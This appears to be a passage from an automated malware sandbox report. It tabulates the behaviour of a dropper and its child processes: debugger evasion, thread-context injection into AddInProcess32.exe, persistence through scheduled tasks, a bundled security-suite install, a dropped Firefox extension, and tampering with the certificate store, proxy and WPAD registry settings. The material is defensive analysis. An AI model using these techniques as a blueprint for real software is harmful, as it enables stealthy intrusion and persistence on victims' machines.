| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\62ff8a0e3f1d6be4a1fcd7500524d92861270e431b487f36130ef39945482a22_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\pNS5nWFOnPuRyVaJWEap6nB1.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\pNS5nWFOnPuRyVaJWEap6nB1.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1280 set thread context of 2988 | N/A | C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\360\Total Security\i18n\pl\ipc\appmon.dat | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\360\Total Security\netmon\netdrv\50\360netmon_50_old.sys | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\360ss2map.ini | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\pl\deepscan\dsr.dat | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\Repair.exe | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\config\tools\nodes\DailyNews.xml | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\softmgr\data\SoftDetect.dat | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\config\lang\ru\SysSweeper.ui.dat | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\Utils\CondrvFix.exe | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\filemon\AVLib.dat | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\Utils\SysCleaner.dll | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\sweeper\360OKCleanNew.dat | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\zh-CN\LibSDI.dat | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\sweeper\SysSweeper.dat | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\ja\UrlSettings.dll.locale | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\pl\ipc\yhregd.dll.locale | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\deepscan\DsSysRepair.dll | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\en\ipc\360netd.dat | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\ru\ipc\appmon.dat | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\config\tools\nodes\PatchUp.xml | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\en\deepscan\dsr.dat | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\en\ipc\regmon.dat | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\en\ipc\appd.dll.locale | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\zh-CN\ipc\filemgr.dll.locale | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\softmgr\SML\SoftMgrLite.exe | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\dynlbase.dll | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\zh-TW\safemon\CameraProtect\CameraGuard\bkg\pic_01.jpg | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\pt\ipc\yhregd.dll.locale | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\zh-CN\deepscan\DsRes64.dll | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\netmon\netmstart.dll | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\de\safemon\udisk.locale | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\ipc\360boxld.exe | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\360Common.dll | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\safemon\Log\PopWndTrackerLog\pop.log | C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\config\newui\themes\default\datashield_theme.xml | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\360rcbase.dat | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\softmgr\OptadnNet.dat | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\fr\deepscan\cloudsec3.dll.locale | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\it\safemon\webprotection_firefox\plugins\nptswp.dll.locale | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\ru\safemon\spsafe64.dll.locale | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\deepscan\deepscan.dll | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\sweeper\RemoteTrashInterface.dll | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\vi\safemon\wd.ini | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\360\Total Security\safemon\filelog.db-journal | C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\netmon\360netctrl.dll | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\deepscan\DSFScan.dll | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\deepscan\BAPIDRV64_old.sys | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\360\Total Security\deepscan\netconf.dat | C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\de\safemon\wdk.ini | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\hi\libaw.dat | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\safemon\360bsmon.tpi | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\modules\360PatchMgr.exe | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\Utils\DesktopPlus\DesktopPlus64.exe | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\ipc\SXIn.dll | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\safemon\360SelfProtection_win10.sys | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\deepscan\BAPIDRV_win10.sys | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\pt\deepscan\dsurls.dat | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\ru\libaw.dat | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\zh-TW\ipc\appd.dll.locale | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\it\safemon\wdk.ini | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\config\tools\nodes\FileSmasher.xml | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\softmgr\GroupMaps.ini | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\ru\safemon\wd.ini | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\axplont.job | C:\Users\Admin\AppData\Local\Temp\62ff8a0e3f1d6be4a1fcd7500524d92861270e431b487f36130ef39945482a22_NeikiAnalytics.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.app.log | C:\Program Files (x86)\360\Total Security\modules\KB931125-rootsupd.exe | N/A |
| File created | C:\Windows\Tasks\bqGGCwwWIommTRgeuN.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\WKALCIrwIEiqhKBsn.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\jiLwFdOzPPQiWLm.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\QdCYtDviHOrgqJLgZ.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates physical storage devices
Program crash
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zSE4E3.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zSE4E3.tmp\Install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SysWOW64\rundll32.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | C:\Windows\SysWOW64\wscript.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\22-e0-e3-f9-d6-14\WpadDecisionReason = "1" | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 30f729f043b2da01 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{27BC88BA-AE9E-41F5-8DB0-25DA1F741C58}\WpadDecisionTime = 501b3c0344b2da01 | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{27BC88BA-AE9E-41F5-8DB0-25DA1F741C58} | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\360Safe\360Scan\NetProbe\1 = "1" | C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\22-e0-e3-f9-d6-14 | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\22-e0-e3-f9-d6-14\WpadDecision = "0" | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\360Safe | C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\360Safe\360Scan | C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{27BC88BA-AE9E-41F5-8DB0-25DA1F741C58}\WpadNetworkName = "Network 3" | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\ActiveMovie\devenum | C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached | C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT\frDbhUXJJbPEeVC\VkQpaXL.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{6C467336-8281-4E60-8204-430CED96822D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 010000000000000010c80ff043b2da01 | C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT\frDbhUXJJbPEeVC\VkQpaXL.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT\frDbhUXJJbPEeVC\VkQpaXL.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{27BC88BA-AE9E-41F5-8DB0-25DA1F741C58}\22-e0-e3-f9-d6-14 | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\360Safe\360Scan\NetProbe | C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum | C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\22-e0-e3-f9-d6-14\WpadDecisionTime = 501b3c0344b2da01 | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\22-e0-e3-f9-d6-14\WpadDetectedUrl | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{27BC88BA-AE9E-41F5-8DB0-25DA1F741C58}\WpadDecision = "0" | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
